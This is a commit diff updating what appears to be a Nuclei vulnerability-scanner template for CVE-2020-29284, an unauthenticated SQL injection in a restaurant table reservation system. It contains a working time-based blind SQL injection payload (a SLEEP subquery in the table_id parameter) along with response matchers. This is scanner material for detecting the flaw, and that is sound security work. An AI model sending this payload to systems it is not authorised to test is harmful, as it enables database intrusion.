Update CVE-2020-29284.yaml
parent
37aaddf1ff
commit
183af79826
|
@ -8,22 +8,32 @@ info:
|
|||
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cve-id: CVE-2020-29284
|
||||
tags: cve,tablereservation,cve2020,sqli
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2020,tablereservation,sqli
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+-"
|
||||
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=5'
|
||||
- 'duration>=6'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Restaurent Tables"
|
||||
- "Chair List"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- 200
|
||||
|
|
Loading…
Reference in New Issue